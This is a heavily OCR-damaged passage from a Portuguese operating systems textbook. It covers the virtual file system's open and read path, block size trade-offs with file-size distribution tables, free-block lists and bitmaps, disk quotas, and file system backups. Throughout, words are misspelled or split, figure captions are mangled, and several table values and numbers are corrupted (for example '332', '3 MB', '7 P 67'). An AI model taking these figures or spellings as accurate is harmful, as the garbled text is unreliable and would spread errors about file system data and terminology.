simplesmente chamando a ftmęao equivalente no arranjo 
fornccido pelo sisiema de arquivos, O VFS lambem sabe 
como executar cada uma das outras funęóes que os siste¬ 
mas de arquivos reais devem fornecer: ele simplesmente 
chama a fnnęao cujo endereęo fol da do d u ranie o registro 
do sistema de arquivos. 

Dcpois quc um sisiema de arquivos foi montado, cle 
pode ser usado, Sc um sisiema de arquivos foi montado cm 
/ usr , por cxemplo, c um processo faz a chamada 

ope nf/usr/inc I ude/u n istd. h 111 ,0_RD ON LY) 


durame a analfse do caminho, o VFS verifica que um 
novo sisiema foi montado em /usr e localiza sen super¬ 
bloco por meio de uma busca na lista dc superblocos 
dc sistemas dc arquivos montados. Feito isso, ć possivcl 
enoontrar o diretório-raiz do sistema montado c pcsąni- 
sa r pelo caminho indiukłunistdJh En tao, o VFS cria um 
v-node (na RAM), junto com outras informaęóes, e, o 
mais importanie, tria um pomeiro apontando para a ta¬ 
bela de funęoes para chamada de operaęoes no v-node, 
como read, write, ciose etc. 

Após a criaęao do v-nodc r o VFS registra uma entrada 
para o processo na tabela dc descritores de arquivos c faz 
com que da aponle para o novo v-nodc. (Para os puristas, 
o que o descritor do arquivo faz, na verdade, e apontar para 
omra estru tura de dados que contem a posięao atual do 
arquivo e um pomeiro para o v-node, mas esse detalhe nao 
e releyante para os nossos propósiios.) Finalmente, o VFS 
retorna o descritor do arquivo para o processo, de modo 
que a informaęao possa ser usada em operaęoes de leitura, 
escrita e fechamento do arqtiivo. 

Mais larde, quando o processo realizar um read com 
o descritor do arquivo, o VFS localiza o v-node a partir do 
processo e da tabela de descritores e segue o pomeiro ate 
a tabela de funęoes, na qual estao os endereęos do sistema 
de arquivos real, nos quais reside o arquivo soliritado. A 
fnnęao responsavel pelo read e, entao, chamada, e o có- 
digo do sistema real visita e recupera o bloco seledonado. 
O VFS nao faz ideia se os dados vem do disco local dc um 
sistema remoto na rede, de um CD-ROM, dc um cartao dc 
memória ou dc algurn outro ntcio dc armazenamento, As 
estruiuras dc dados envolvidas estao representadas na Fi¬ 
gura 4,17, A localizaęao comeęa pelo nu mero do processo 
cliamador e pelo descritor do arqiuvo, segue para o v-node, 
o pomeiro da fnnęao de leitura e a funęao de acesso dentro 
do sistema real. 

Dcssa mancira, torna-sc relativamcmc simples induir 
um novo sistema dc arquivos. Para fazer um, os projetistas 
primeiro tornam uma lista dc chamadas de ftinęóes espera- 
das pelo VFS e, em seguida, escrevem seu próprio sistema 
de arquivos, de modo a oferecer todas elas. No caso de o 















Sn#w 


180 Sistemas operacionais modernos 



Figura 4.17 Urna vis§o sinnplificada das estruturas de dados e do código utilizado pelo VFS e pe!o sistema de arquivos real para 
u ma operaęSo read. 


sis te ma de arquivos ja existlr, sera necessario providendar 
funęoes adaptadoras que faęam o que o VFS prerisa, em 
geral realizando uma ou mais cha ma das nativas ao sistema 
de arquivos real* 

ffl Gerenciamento e otimizaęao 
_ dos sistemas de argułyos 

Fazer o sistema de arquivos funtionar e uma coisa; 
fazc-lo funckmarde forma cfkiente e robusta na vk!a real 
c algo basta me difereme. Nas seęocs a scguir, discutiremos 
algumas qucstÓes relacionadas aogcrenriamento de discos, 

4.4,11 Gerenciamento de espaęo em disco 

Os arquivos normalmcntc sao armazcnados cm disco; 
portanto, o gerenciamento do espaęo em disco e uma das 
prindpais preocupaęoes dos projctisias dc sistemas* Exis- 
tem duas esiratćgias gerais para armazenar urn arquivo dc 
n bytes; ou sao alocados n bytes consecutivos de espaęo em 
disco, ou o arquivo e dividido em vario$ blocos (nao neces- 
sariamente} contfguos. O mesmo compromisso existe para 
os sistemas de gerenciamento de memória entre segmenta- 
ęao pura c paginaęao. 

Gon formę vimos, o armazenamento dc um arquivo 
como uma sequencia contfgua de bytes apresenta o pró¬ 
bie ma óbvio de que, se o arquivo tresce, provavelmeme 


ele devera ser movido dentro do disco. O mesmo problema 
ocorre para segmentos na memória, excet:o que o movi- 
mento de um segmentu na memória e uma operaęao re- 
iativamente rapida se comparada a o movimento de um 
arquivo de uma posięao do disco para outra. Por isso, qua- 
se todos os sistemas de arquivos quebram os arquivos ero 
blocos de tamanho (ixo, que nao precisam ser adjacentes* 

Tamanho do bJoco 

Uma vcz quc sc opia pelo armazenamento em blocos 
de tamanho fteo, a questao que surge t qual dcve ser o la- 
manho do bloco* Dado o modo como os diseos sao organi- 
za dos, o scior, a trilha e o eilindro sao candidatos natuiais a 
unidadc de alocaęao (e mb ora sejam todos (Icpendentes do 
dispo5ilivo, o que ć um ponto negativo), Em um sistema dc 
paginaęao, o tamanho da pagina e tambem um argumentu 
importanie. 

Uma grandę umdade de alocaęao, como um eilindro, 
signifi ca quc ca da arquivo, mesmo um arquivo dc I bytu, 
ocupara um eilindro imeiro* Tambem significa quc arqui- 
vos peąuenos desperdięam um espaęo stgmficativo do dis¬ 
co. Por outro lado, uin tamanho peąueno de bloco significa 
que a maioria dos arquivos ocupara mais de um bloco e, 
portamo, demandarain mtiliiplas buseas e atrasos de roia- 
ęao para serem lidos, reduzindo o desempcnlio. Sc a uni- 
dadc dc alocaęao for muito grandę, ocorre desperdfcio dc 
espaęo; se for muito pequena, despcrdido dc tempo. 
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Fazer uma boa escolha reguer alguma infoimaęao sobre a 
distribuięao do tamanho do arquivo. Tanenbaum et aL (2006) 
esiudaram o Lema da distribuięao dos tamanlios dos arquivos 
no Departamento dc Cicuda da Computaęao dc uma grandę 
imiversidade cm 19S4 e cm 2005 (a Universidade Viije) e 
tambem em um servidor da Web conierdal hospedando urn 
sile de polfiica (<www.eleaoral-voie.com>). Os resultados 
sao mostrados na Tabela 43, na qual sc lista, para ca da grupo, 
a portem a gem de todos os arquivos menores ou iguais ao m- 
manlio {representado por poiencia de base 2). Em 2005, por 
ejcemplo, 59,15 por ccnto de lodos os arquivos da UV tinharn 
4 KB ou men os, e 90, M por cenio dc lodos os arquivos ii- 
nham ale 64 KB. O tamanho medio dos arquivos era de 2.475 
bytes, tamanho que pode surpreender algtms. 

A quais eon cl u so es podemos chegar a partir dos da¬ 
dos? Primeiro, com um bloco dc 1 KB, somente cerca dc 
30-50 por ccnto de todos os arquivos cabem cm um dni co 
bloco, ao passo que, com um bloco de 4 KB, a porcentagem 
de arquivos que caberia em somente um bloco alimenta para 
uma faixa dc 60-70 por ccnto, Outros dados nos mostram 
que, com blocos dc 4 KB, 93 por ccnto dos blocos do disco 
sao tuilizados por 10 por cenio dos tnaiores arquivos. Isso 
signifiea que odesperdfdo de espaęo ao finał de cada arqui- 
vo pcqueno ć insignificank, pois o disco csła replelo por 
uma pequena quantidade de arquivos grandes (videos), e o 
montante total de espaęo ocupado pelos arquivos menores 
acaba na o sendo importame. Mesmo dobrando o espaęo, a 
ocupaęao dc 90 por ccnto dos menores arquivos seria pra- 
licamente imperceplivel. 


Tamanho 

UV 1984 

UV 2005 

Web 

1 

1,79 

1,38 

6,67 

2 

1 „88 

1,53 

7 P 67 

4 

2,01 

1,65 

8.33 

8 

2,31 

1.80 

11,30 

16 

332 

2,15 

11,46 

32 

5 r 13 

3 t 15 

12.33 

64 

8,71 

4,98 

26 P 10 

128 

14 P 73 

8,03 

28.49 

256 

23 P 09 

13,29 

32 P 10 

512 

34,44 

20,62 

39.94 

1 KB 

48,05 

30,91 

47,82 

2 KB 

60,87 

46,09 

59,44 

4 KB 

75,31 

59,13 

70,64 

8 KB 

84,97 

69,96 

79,69 


Por ouiro lado, usar uma untdade de aloeaęao pequena 
significa que cada arquivo sera formado por muitos blocos. 
Ler cada bloco em gcral requer uma busca e um atraso ro¬ 
la cional; ponanto, a leitura dc um arquivo formado por 
muitos blocos peąucnos sera lenta. 

Como um exemplo, considere um disco com 1 MB por 
Irilha, um tempo dc rotaęao de 8,33 ms c um tempo medio 
de busca dc 5 ms. Q tempo cm milissegundos para ler um 
bloco de k bytes e, entao, dado pela soma do postdona- 
mento, do atraso rota cional e dos tempos de transferenria: 

5 + 4,165 + (ki 1000000) x 8,33 

A cum iracejada da Figura 4,18 mostra a iaxa dc da¬ 
dos para um disco em funęao do tamanho do bloco. Para 
calcular a eficienda de ocupaęao, e preciso elaborar uma 
hipótese sobre o tamanho medio de arquivo. Fara siinpii- 
ficar, vaimos considerar que todos os arquivos tern 4 KB, 
Embora esse nu mero seja um pouco major do que os dados 
inensurados na UV, e possfvel quc os alunos tenham arqui- 
vos menores do quc os cxistcntes nos ccntros dc dados cor- 
porativos. A curva continua mostra a eficienda dc espaęo 
como funęao do tamanho do bloco. 

As duas curvas podem ser entendidas como o seguin- 
te: o tempo de acesso a um bloco e completamente do- 
minado pela tempo de posicionamento e pelo atraso rota- 
cional; ponanto, uma vcz que demore 9 ms para acessar 
um bloco, ąuanto mais dados forem posicionados, meIbor 
Assim, a laxa de dados cresce eon formę o tamanho do blo¬ 
co {ale quc as transfercncias dcmorcm tanio quc o tempo 
de transferencia com ccc a fazer difcrenęa). 


Tamanho 

UV 1984 

UV 2005 

Web 

16 KB 

92,53 

78,92 

86,79 

32 KB 

97,21 

85,87 

91,65 

64 KB 

99,18 

90,84 

94,80 

128 KB 

99,84 

93,73 

96 r 93 

256 KB 

99,96 

96,12 

98,48 

512 KB 

100,00 

97,73 

98.99 

1 MB 

100,00 

98,87 

99.62 

2 MB 

100.00 

99,44 

99,80 

4 MB 

100,00 

99,71 

99.87 

3 MB 

100,00 

99,86 

99,94 

16MB 

100.00 

99,94 

99,97 

32 MB 

100,00 

99,97 

99.99 

64 MB 

100,00 

99,99 

99.99 

128 MB 

100,00 

99,99 

100.00 


I Tabela 4,3 Porcentual de anquivos menores do que um determinado tamanho (em bytes}. 
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I Figura 4,18 A curva tracefada (escala da asquerda) imostra a I 
eficifencla do espaęo errs disco. Todos os arquivos iśm 4 KB. 

Considere agora a cfidcncia do espaęo. Com arquivos 
de 4 KB e blocos de 1 KB, 2 KB ou 4 KB, os arquivos usam 
4, 2 e 1 bloco, respectiva menie, sem desperdfcio. Com u ni 
bloco de S KB e arquivos de 4 KB, a eliciencia cat para 
50 por cento, e com blocos de 16 KB, para 25 por cento. Na 
yerdade, o tamanho de poucos arquivos e multiplo exato 
do tamanho do bloco do disco, o que sempre acarrela des- 
perdfdo dc espaęo no ultimo bloco do arquivo. 

O que as curvas niostram, contudo, e que o desempe- 
nlio e a ocupaęao do espaęo estao inerentemenie em eon fil ¬ 
io. Peąuenos blocos sao ruins para o desempenho, mas bons 
para a ocupaęao do espaęo em disco. Para esses dados, nao 
ha equilibrio que seja razoavel. O tamanho mais prósimo 
daquele onde as duas curvas se enconlram e 64 KB, mas a 
taxa de dados e de somente 6,6 MB/s e a eficienda de espa¬ 
ęo e de cerca de 7 por cento — nenhnm dos dois, porta n to, 
e muito bom. Historicamente, os sistemas de arquivos tern 
cscolhido tamanhos na faixa dc 1 KB a 4 KB, mas, com dis- 
cos atuais que excedem I TB, talvez seja mdhor aumentar 
o tamanho do bloco para 64 KB e aceitar o desperdfcio de 
espaęo. Hoje em dta, difirilmente faltara espaęo em disco. 

Em urn experimento realizado para verifkar se o uso 
de arquivos no Windows NT era consideravdmente dife- 
rente do uso dc arquivos no UNiX, Vogels lcvantou me- 
didas ern arquivos na Universidade dc Corncll (Vogcls, 
1999). Ele observou quc o uso de arquivos no NT e mais 
compltcado que no UNIX. Ele escreveu; 

Quando digitamos al§un$ caraetem no editor de texto no¬ 
tę pad, o mlvamento dem dhjitaem em um arquivo dispam 26 
chmadas de sistema, incluwdo tres tentatms de ahertum que 
faiharam, urna sobreposiędo de arqum e ąuatro seątiendas adi - 
clonais de abertura e fedtamento, 

Apesar disso, cle diegou a um tamanho mediano 
(ponderado pelo uso) dc 1 KB para arquivos apenas lidos; 
de 2,3 KB para arquivo$ escritos, e de 4,2 KB para arquivos 
lidos e escritos. Considerando os diferentes conjuntos de 
tecnicas dc medięao c o ano, os resultados certa men te sao 
compat(vei$ com os da Universidade Vrijc. 


taxa de dados de um disco. A curva continua (escala da di rei ta) traz a 


Monitoramento dos blocos livres 

Urna vez escolhido um tamanho de bloco, a próxima 
qticslao e monitorar os blocos livres. Dois metodos sao ani- 
plamente usados, eon formę mostra a Figura 4.19. O pri- 
meiro consiste em usaruma lista encadeada de blocos, com 
catfa bloco conicndo tantos blocos livrcs quantos conbercm 
nele. Com um bloco de 1 KB c um nu mero de bloco de 
disco de 32 bits, cada bloco na lista dc blocos Iivres contem 
os mtmeros de 255 blocos 3ivres. (Unia entrada e reserva- 
da ao ponteiro para o bloco seguinte,} Um disco de 500 GB 
possni cerca de 488 milhoes de blocos, Armazenar todos os 
cndereęos cm blocos de 255 reąuer cerca de 1,9 milhao de 
blocos. Muitas vezes os blocos livres sao usados para eonier 
a lista de livrcs, de modo que a armazenagem seja essen- 
dalmeme livre. 

A outra tecnica de gerendamento de espaęo livre e 
o mapa de bits. Um disco com n blocos reąuer um mapa 
de bits com n bits. Os blocos livres sao representados, no 
mapa. por Is e os blocos alocados, por Os (ou vice-versa). 
No exemplo do disco de 500 GB, precisamos de 488 milhóes 
de bits para o mapa, o que requer algo abaixo de 60 mil 
blocos de 1 KB cada para armazenamento, Naoadmira que 
os ma pas dc bits regueiram menos espaęo, ja quc usam 
1 bit por bloco, versus 32 bits no modelo dc lista encadeada. 
Só se o disco estiver quase cheio (isto e, com poucos blocos 
livrcs) e que o esquema de lista encadeada prerisara de me¬ 
nos blocos que o mapa de bits. 

Por outro lado, se houver muilos blocos Iivres consc- 
cutivos, o sistema da lista de livres pode ser modificado de 
forma a controlar conjuntos de blocos, em vez de blocos 
unlmduais. Um contador dc 8, 16 ou 32 bits poderia estar 
associado a cada bloco e, assim, fornecer a ąuamidade de 
blocos livres. No melhor dos casos, um disco basicamente 
vazio poderia ser representado por dois numeros: o endere- 
ęo do primciro bloco 1ivre, seguido polo contador de blocos 
livres. Por outro lado, se o disco ficar muito Iragmentado, 
o controle dos grupos ć menos clkicntc do que o dc blocos 
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Blocos livres de disco: 16, 17, 18 


42 

r 

230 


86 


1001101101101100 

136 



162 



234 


0110110111110111 

210 



612 



897 


1010110110110110 

97 



342 



422 


0110110110111011 

41 



214 



140 


1110111011101111 

63 



160 



223 


1101101010001111 

21 



664 



223 


0000111011010111 

48 



216 



160 


1011101101101111 

262 



320 



126 


1100100011101111 






- 



" su 

310 



180 



142 


0111011101110111 

516 


482 

y 

141 


1101111101110111 


Urn bloco de disco de 1 KB pode conter 256 numeros Um mapa de bits 

de blocos de disco de 32 bits 

(a) (b) 

I Figura 4.19 (a) Armazenamento da ii sta de blocos livres em urna lista encadeada. (b) Um mapa de bits. 


individuais, ja que tamo o endereęo quanto o contador de- 
vem ser armazenados. 

Essa ąuestag ilustra um probienia com o qual os pro- 
jetistas de sistemas operadonais sempre prerisain lidar: li a 
diversas estru lu ras de dados e algoriimos que podem ser 
iitilizados na soluęao de um próbie ma, mas a escolha do 
melhor deles reąuer dados que os projetistas nao tem e nao 
terno ate que o sistema seja distribmdo e largamente utili- 
zado. Ainda assim, pode ser que os dados nao fiąuem dis- 
pomveis. Por excmplo, na medicao qne realizamos na UV 
em 1984 e 2005, os dados do site da Web e os dados de Cor- 
nell sao apenas quatro exemplos. Ernbora melhor do que 
nada, temos pouca certeza de que des dao conta, tambem, 
dos computadores darnesiicos, corporaiivos, do govemo e 
oulros. Com ceno csforęo, leria sido possivd conseguir exem- 
plos de outros computadores, mas ainda assim seiia ingenuo 
tentar abarcar indos os computadores dos tipos avaliados. 

Vokando ao metodo da lista de blocos livres, faz-se ne- 
cessario manier somente um bloco de ponteiros na memó¬ 
ria principal, Quando um arquivo e criado, os blocos ne- 
ccssarios sao tomados do bloco de ponteiros. Qimndo esse 
bloco dc ponteiros se csgota, um novo bloco dc ponteiros c 
lido do disco. De maodra semdliante, ąuando um arquivo 
c rememdo, seus blocos sao liberados e adidonados ao blo¬ 
co de ponteiros na memória principal. Quando complcto, 
esse bloco de ponteiros e escrito no disco. 

Sob certas drcunstandas esse metodo acarreta opera- 
ęoes desnecessarias de E/S em disco. Considere a situaęao 
da Figura 4.20(a), na qual o bloco de ponteiros na memória 
tenha lugar apenas para mais duas cmradas. Se um arqui- 
vo de tres blocos for liberada, o bloco de ponteiros trans- 
bordara e cle devera ser escrito para o disco, levando a si¬ 


tuaęao ilustrada na Figura 4.20 (b). Agora, se for escrito um 
arquivo de tres blocos, o bloco de ponteiros cheio devera 
ser lido novamente, voitando a situaęao da Figura 4.20(a). 
Se o arquivo de tres blocos que acabou de ser escrito cons- 
tituir um arquivo temporario, ąuando cle for liberado, sera 
n ccc ssana outrn operaęao dc cscrita para salvarnovamente 
o bloco de ponteiros cheio no disco. Em resumo, ąuando o 
bloco de ponteiros cstiver quase vazio, unia serie de ar- 
quivc$ tempordrios de vida curta podei a ocasionar muitas 
operaęoes de E/S em disco. 

Uma estrategia alternaiiva que evita muitas dessas 
operaęoes de E/S em disco e repartir o bloco de ponteiros 
cheio. Assim, cm vez dc ir da Figura 4.20(a) para a Figu¬ 
ra 4.20{h), iremos da Figura 4,20(a) para a Figura 4,20(c), 
ąuando forem liberados os tres blocos. O sistema pode, 
entao, tratar uma serie de arquivos temporarios sem fazer 
ąualąuer operaęao de E/S em disco. Se o bloco na memória 
ficar cheio, ele sera escrito para o disco e a metade do bloco 
cheio sera lida do disco. A ideia aqui e maniera maioria dos 
blocos de ponteiros cheios em disco (para minimizar o uso 
do disco), mas manter em memória um bioco cheio pela 
metade; assim, o sistema pode lidar tamo com a criaęao 
ąuanto com a remoęao do arquivo sem fazer uma operaęao 
dc E/S cm disco para a lista dc livrcs. 

Com um mapa de bits, tambem e possfvel manter ape¬ 
nas utn bloco na memória e usar o disco somente ąuando 
o bloco tornar-se cheio ou vazio. Uma vantagem adidonal 
dessa estrategia e que todas as alocaęóes de um bloco unico 
do mapa dc bits faz com quc os blocos de disco fiąuem pró- 
ximos uns dos outros, minimizando, assim, os movimemos 
dos braęos do disco. Como o mapa de bits e uma estrutura 
dc dados dc la ma n ho fixo, sc o nudeo for (parciał mente) 






















































Sn#w 


184 Ststemas operacionais modernos 



(a) 



(b) 





(c) 



Figura 4.20 (a) Um bloco na memória quase cheio de ponteiros para biocos de disco !ivres e tr&s biocos de ponteiros em disco, (b) 
Resultado da liberac&o de um arquivo de tres biocos, (c) Urna estrałegia aF1ernatlva para li dar com os tres bfocos livres, As entradas 
sombreadas representam ponteiros para biocos de disco iivres. 


paginado, o mapa de biis pode ser colocado na memória 
yirtual e ter as paginas do mapa paginadas na memória 
prinripal ąuando necessario, 

Cotas de disco 

Para impedir exageros no uso do espaęo em disco, os 
sistemas operacionais niultiusuario oferecem um mecanis- 
rno para impor cotas de disco. A idcia e que o admimslra* 
dor do sistęma alribua a cada usuario uma cola de espaęo 
em disco, e o sistema operadonal assegure que os usuarios 
nao excedam su as cotas. A seguir esta deser i to um me- 
canismo ripico. 

Quando um usuario abre um arquivo, os airibmos e 
os endereęos de disco sao localizados e colocados em urna 
tabela de arquivo$ abenos na memória prindpal Entre os 
atributos, esta urna entrada indicando quem ć o proprieta- 
rio. Qualquer acrćsdmo no tamanho do arquivo sera debi- 
tado da cola do proprietario. 


U ma segunda tabela centem os registros de cota para 
cada usuario com um arquivo aberto, mesmo que o arquivo 
tenha sido aberto por outra pessoa. Essa tabela e mostrada 
na Figura 4.21* Ela e urna parte extrafda de um arquivo de 
cotas em disco para os usuarios cujos arquivos estao atual- 
mente abenos. Quando todos os arquivos sao fcchados, o 
registro e escrito dc volia para o arquivo de cotas. 

Quando ocorre urna nova entrada na tabela de arqui- 
vos abertos, um pontdro para o registro de cotas do proprie¬ 
tario e atribufdo a ela, a firn de encontrar mais fadlmente 
os varios limites. loda vez que um bloco e adirionado a um 
arquivo, o nu mero total de biocos dc responsabilidade do 
proprietario e increinentado, e os limites flexfveis e estritos 
sao verificados. O limite flextvel pode ser excedido, mas o 
llmite estrito, nao. Urna tentativa de adicionar biocos a um 
arquivo quando o limite es tri to de bloco tiver sido atingido 
rcsttltara em um erro. Tambem existem verificaęóes simila- 
res para o n ii mero dc arquivos. 


Tabela de arquivos abertos 


Tabela de cotas 



Registro de 
cota do 
usuśrto 8 


i Figura 4.21 As cotas sao relacionadas aos usuarios e cootroladas em u ma tabela de cotas. 
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Quando uni usuario lenta entrar no sistema, este ve- 
rifica o arquivo de coias para saber se o usuario excedeu o 
Iimite flexfvel, seja para o niimero de arquivos, seja para 
o numero dc blocos de disco. Sc alguin Umilę fot violado, e 
exibida u ma advcrtenda e o contador dc advertencias res- 
tantes e decresrido dc urn. Sc o comador chegar a zero, isso 
signifiea que o usuario ignorou a advertenda varias vczes e 
nao Ihe sera permilido entrar no sistema. Ob ter a permis- 
sao para entrar nova menie cxigira u ma boa argumeniaęao 
com o administrador do sistema. 

Ncsse metodo, os usuarios podcm ir a kun de seus 13- 
mites flexfveis durante urna sessao de uso, des dc que des 
removam os cxcessos a mes dc se desconecLarcm. Os limites 
estrilos nunca scrao excedidos. 

_ 4.4.21 Cópia de seguranęa do sistema de 

arquivos 

A desmrięao dc um sistema dc arquivos muitas vezes 
e um desastre maior que a desmóęao dc um computador, 
Se um computador for aniqui!ado pdo fogo, por urna des- 
carga clctrica ou uma caneca dc cafe que ca i u no tcclado, 
e um próbie ma c custara algum dinlieiro, mas gcralmentc 
urna iroea de pcęas pode ser kita sem muita complicaęao. 
A te iitesmo computadores pcssoais de baixo custo podcm 
sertrocados em uma hora; basta ir ao revendedor (exceto 
nas universidades, ondc uma ordemde compra deve passar 
por tres comissoes, cinco assinaturas e 90 dias). 

Para um sistema dc arquivos dc um computador quc 
estiver irrccupcravdmente perdido, seja por causa do hard¬ 
ware, seja pdo software, a restauraęao de toda a informaęao 
sera muito dificif consumira tempo e, em muiios casos, se 
m ostra ra mipossfvel. Se programas, documentos, registros de 
imposfos, fichas dc clientes, comprovantes dc pagamentos dc 
impostos, ban cos dc dados, pian os de marketing o u outros 
dados forem perdidos para sempre, as conscqu.cn das podcm 
ser catastrófkas, E mb ora o sistema de arquivos nao ofci eęa 
quaiquer proteęao contra a deslruięao ffsica do eąuipamento 
ou do ind o dc armazenamento, dc pode ajudara protegera 
informaęao. E basfante daro: faęa backups. Porem, issopode 
nao ser tao sini pies q u anto parece. Vamos analisar. 

A maioria das pessoas acha quc nao valc a pena o dis- 
pendio de tempo e esforęo para fazer backups — ale que 
em um belo dia scu disco morre abrupiamenie e a maioria 
delas se converte em seu leito de inorte. Coniudo, as em- 
presas (normalnienie) sabern bem o valor de seus dados e 
costumam fazer um backup pelo menos uma vez ao dia, 
geralmente em fita. As fitas modernas tein capacidade dc 
dezenas ou mesmo cemenas dc gigabyies c cusiam cen ta- 
vos por gigabyte* De qualquer modo, fazer backups nao e 
tao trivial ąuanto parece; porta nlo, estudaremos a seguir 
alguns dos tópicos rełacionados ao assunto. 

De modo geral, as cópias de seguranęa em fita servem 
para Udar com um dc dois próbie mas potenciais; 


1. Recuperaęao em caso de um desastre, 

2. Recuperaęao quando e kita uma grandę bobagem. 

O primciro problema e fazer o computador voltar a 
executar depois dc uma qucbra de disco, dc um incendio, 
de uma enchente ou de qua3quer outra cataslrofe na tu rai. 
Na pratica, cssas coisas nao acontecem muitas vezcs c c por 
isso que as pessoas nao estao babituadas a fazer backups, 
Essas pessoas lambćm tcndcm a nao fazer seguro contra 
incendios cm su as casas pcla mesma razao, 

O segundo problema e que muitas vezcs os usuarios 
removem aridentalmeme arquivos que elesprecisarao usar 
um dia. Esse problema ocorre tantas vezes que, quando e 
'removido H pelo Windows, o arquivo nao e totalmente eli- 
mina do, mas apenas transferido para um diretório espedal, 
a cesta de reciclagenri {recyckbm). Assim, posteriormcm 
te, ele podera ser procurado e restaurado facilmente. Os 
backups levam esse principio ao cxtrcmo e permiicm quc 
arquivos removidos dias ou ale mesmo senianas atras pos¬ 
sani ser restaurados a panir de fitas antigas de backups* 

Fazer um backup leva muito tempo e ocupa uma gran¬ 
dę ąuantidade de espaęo; portanto, realiza-lo de maneira 
eonvcnicnie e cficicntc c iniportante. Essas considcraęocs 
levantam as seguimes quesioes: primeiro, devem-se fazer 
cópias de seguranęa de todo o sistema de arquivos ou apenas 
de parte dele? Em muitas insialaędes, os programas (bina- 
rios) executaveis residem em uma parte limilada da arvo- 
re do sistema de arquivos. Nao e neccssario fazer backups 
desses arquivos se des puderem ser reinstalados a partir do 
CD-ROM fomccido pelo fabricante* Alem disso, a maioria 
dos sistemas tern um diretório de arquivos temporarios. Nao 
ha, cm geral, uma razao para fazer cópias de seguranęa des¬ 
ses arquivos. No UN1X, todos os arquivos espedais (disposi- 
livos de E/S) sao mantidos em um diretório /dev. Alem de ser 
desnecessario, e exiremamenie perigoso fazer cópia desses 
arquivos porque o programa de backup poderia nao voltar 
mais a fundonar se dc [osse lentar ler cada um desses ar- 
quivos atc tenninar. Em resumo, o mclhor e fazer cópias de 
seguranęa apenas de diretórios espedficos c dc tu do o que 
esta neles em vcz. dc fazc-lo de todo o sistema dc arquivos. 

Em segundo lugar, e um desperdfdo fazer cópias de se¬ 
guranęa de arquivos que nao tenham sido alterados desde 
o ultimo backup, o que leva a idcia dc cópias ineremen- 
tais, A forma mais simplcs de cópia incremcntal ć fazer 
periodieanieme a cópia completa (backup) — por exem- 
plo, sernanal ou inensalmemc — e fazer uma cópia diaria 
somemc dos arquivos que tenham sido modificados desde 
a ultima cópia completa. Embora minimize o tempo de có¬ 
pia, esse esquema toma a recuperaęao mais complicada, 
pois a cópia completa mais recenic dcvc ser restaurada pri¬ 
meiro e depois todas as cópias incrcmcntais tem de ser res- 
tauradas na ordem inversa. Para faciliiara restauraęao, sao 
usados esquemas de cópias inerememais mais sofisticados. 

Em terceiro lugar, como normalnienie sao copiadas 
quantidades imensas de dados, pode ser desejavd comprimir 
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os dados anies de escreve-los na fita. Comudo, para muUos 
algoritmos de compressao, um peąuenino defeito na fita de 
backup pode por a perder o algoritmo de dcscompressao e 
tornar impossivel Icr todo um arquivo ou ate mesnio toda 
a lila. Portanto, a decisao de comprimir os dados de backup 
deve ser aiidadosamente considerada. 

Em ąuarto lugar, e diffcil fazer um backup enąuanto o 
sistema de arquivos estiver sendo utilizado* Se os arquivos 
e os diretórios estiverem sendo adicionados, removidos e 
modificados duramc o processo de cópia, a cópia resultaLi¬ 
te poderii sc tornar inconsistente. C outu do, fazer urna cópia 
pode levar horas; portanto, talvcz seja neccssario deixar o 
sistema off-line para que passe utną boa parte da noite fa- 
zendo o backup — algo quc nem sempre c accitavel. Por 
isso. sao criados algoritmos que extraem uma descrięao do 
estado atual do sistema de arquivos (smpskot) e salvam 
suas esirutitras de dados crfticas. Em seguida, as mudan- 
ęas que sera o rcalizadas no futuro ocorrerao como cópias 
de blocos em vez de aiualizaęoes de arquivos e diretórios 
(Hutchinson ei al., 1999). Desse modo, o sistema de arqui- 
vos e congelado no momento da extraęao da descrięao e, 
portanto, o backup pod era ser feito poste riormeme. 

Em ąiiinto e ultimo lugar, fazer backups introduz mui- 
tos problemas tecnkos em uma organizaęao. O mci hor sis¬ 
tema de s egu ranę a on-linę do ntundo pode se tornar iniitil 
se o admi nistrador do sistema mamiver todas as Ii Las de 
backup cm scu escritório e deixa-lo a berto c desprot egido 
quando dc sair para tornar um cafe. Tudo o que um espiao 
teria de fazer seria entrar rapidamenie na sala, colocar uma 
pequena fila em seu bolso e sair assobiando alegremente. 
Adeus, seguranęa, Aleni disso, fazer um backup diario teria 
pouca utrUdade sc um mcendio que atingisse os computa- 
dores tambem atingisse as fitas do backup. Por isso, essas 
fitas devem ser mamidas em um locai externo, o que re- 
suita na introduęao dc mais riscos (porąuc agora dois locais 
devem ser pro tęgi dos). Para uma discussao sobre esses e 
outros assuntos de praiicas admiriisLrativas, veja Nemcth et 
al. (2000). A seguir, dlscutircmos somente os tópicos tecni¬ 
cos rdacionados ao backup dc sistemas dc arquivos. 

Para copiar um disco para uma fita, podem ser adota- 
das duas estrategias: uma cópia fisica ou uma cópia lógica. 
Uma cópia fisica (ou dump lisico) imcializa-se no bloco 
0 do disco, escreve em ordem rod os os blocos de disco na 
fita e para ąuando terminar de copiar o ultimo bloco. Esse 
pr ogra ma e tao simples que provaveimente pode ser imple- 
mcmado 100 por cent o livrc de erros — algo que nao vale 
para ąualąuer ouiro programa util 

No entanto, sao opon u nos alguns comentarios sobre a 
cópia fisica. Em primeiro lugar, nao e litil copiar blocos de 
disco que nao estejam sendo usados. Se o programa de cópia 
pode ter accsso a estru tura de dados dos blocos livres, cle 
pode evitar a cópia de blocos que nao estejam sendo usados. 
Contndo, saltar esses blocos requer que o numero de cada 
bloco seja escrito na frentc do bloco (ou algo parcddo), pois 
o bloco k na fita nao correspondera niaisao bloco k do disco. 


Um segundo comentario e sobre a cópia de blocos de- 
feituosos. E: quase impossiveI fabricar discos sem que exis- 
tam defeitos. Alguns blocos defeituosos sempre estarao 
presentes. Algumas vezes r quando e realizada uma forma- 
taęao de baixo mvel, os blocos defeituosos sao detectados, 
marcados como mins e substituidos por blocos rescrva quc 
existem no finał de cada trilha para situaęóes de emergen- 
da como essa. Em muitos casos, o controlador de disco ge- 
rencia a subslituięao de blocos de forma transparente, sem 
quc o sistema op e racic na 1 torne conhecimcnto do o corrido. 

Algumas vezes, entretanto, os blocos ficam ruins de- 
pois da formataęao e acabam sendo dctectados pelo sistema 
operacionak Em geral, o próprio SO resolve o problema 
criando um 'arquivo' quc cantem todos os blocos defeituo¬ 
sos — somente para sc certificar dc quc des nao vao nunca 
apareccr como 1ivres c nunca serao ocupados. Nao c neces- 
sario dizer que nao e posstvef ler esse arquivo. 

Se todos os blocos defeituosos forem remapeados pelo 
controlador de disco e ocultados do sistema operaciona! — 
como descrcYcmos —, a cópia lisica funcionara bem. Por 
outro lado, se eles forem visfveis ao sistema operacional e 
